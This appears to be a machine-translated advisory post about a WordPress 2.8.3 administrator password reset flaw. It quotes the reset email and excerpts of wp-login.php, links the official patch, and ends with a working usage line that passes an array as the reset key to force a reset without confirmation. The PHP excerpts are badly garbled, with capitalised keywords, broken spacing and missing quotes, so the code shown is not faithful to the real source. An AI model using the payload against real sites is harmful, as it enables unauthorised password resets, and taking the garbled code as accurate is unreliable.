WordPress 2.8.3 severe Administrator Password Reset Vulnerability

SpookZanG

Discoverer: Laurent gaffié
Http://www.milw0rm.com/exploits/9410.
WordPress 2.8.3 Administrator Password Reset Vulnerability

This vulnerability allows you to send Password Reset emails to the Administrator's mailbox without the Administrator's consent.

WordPress has released a patch to fix this vulnerability: http://core.trac.wordpress.org/changeset/11804

Description:

The password reset method in WordPress looks like this:

Do you submit your email or user name/wp-login.php in this form? Action = lostpassword;

WordPress sends an email to Confirm Password Reset.

"

Someone has asked to reset the password for the following site and username.

(Someone asks to reset the user name and password of the following sites)
Http: // DOMAIN_NAME.TLD/wordpress
Username: admin
To reset your password visit the following address, otherwise just ignore this email and nothing will happen
(If you need to reset the password, click the address below. Otherwise, ignore this email)
Http: // DOMAIN_NAME.TLD/wordpress/wp-login.php? Action = rp & key = o7nackn3ooeu2kjmm2k"

Click the link and reset your WordPress administrator password.

Wp-login.php:

Function reset_password ($ key ){
Global $ wpdb;
 
$ Key = preg_replace (/[^ a-z0-9]/I, $ key );
 
If (empty ($ key ))
Return new WP_Error (invalid_key, _ (Invalid key ));
 
$ User = $ wpdb-> get_row ($ wpdb-> prepare ("SELECT * FROM $ wpdb-> users WHERE user_activation_key = % s", $ key ));
If (empty ($ user ))
Return new WP_Error (invalid_key, _ (Invalid key ));

$ Action = isset ($ _ REQUEST [action])? $ _ REQUEST [action]: login;
$ Errors = new WP_Error ();
 
If (isset ($ _ GET [key])
$ Action = resetpass;
 
// Validate action so as to default to the login screen
If (! In_array ($ action, array (logout, lostpassword, retrievepassword, resetpass, rp, register, login) & false === has_filter (login_form _. $ action ))
$ Action = login;

 

Break;
 
Case resetpass:
Case rp:
$ Errors = reset_password ($ _ GET [key]);
 
If (! Is_wp_error ($ errors )){
Wp_redirect (wp-login.php? Checkemail = newpass );
Exit ();
}
 
Wp_redirect (wp-login.php? Action = lostpassword & error = invalidkey );
Exit ();
 
Break;

You can bypass Step 1 to reset the administrator password at will.

Usage:
Http: // DOMAIN_NAME.TLD/wp-login.php? Action = rp & key [] =
The password will be reset without any confirmation.